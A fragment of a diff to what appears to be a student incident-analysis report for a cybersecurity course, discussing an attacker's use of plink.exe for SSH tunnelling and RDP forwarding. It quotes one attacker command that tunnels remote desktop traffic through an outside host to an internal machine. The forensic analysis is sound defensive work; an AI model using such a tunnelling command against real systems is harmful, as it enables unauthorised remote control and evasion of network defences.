blackTieV2/ZEIT8028/Assignments/Assignment2/Reports/First Draft.md

      Command: plink.exe -ssh 69.50.64.20 -P 22 -L 127.0.0.1:12345:10.2.0.2:3389
      ```

-   - **Significance:** The use of port `3389` is particularly concerning, as it allows the attacker to operate a remote desktop session, effectively gaining complete control over the system.
+   - **Significance:** The execution of plink.exe and its use for SSH tunneling and RDP forwarding were critical in ensuring the attacker could maintain control over the compromised system.
+This persistence mechanism allowed the attacker to bypass network defenses and potentially exfiltrate data or execute further commands remotely.
+The fact that the forwarded port was 3389, the default port for RDP, indicates the attacker was specifically aiming to enable remote desktop access, which is a strong indication of the sophistication and intent behind the compromise..

 ---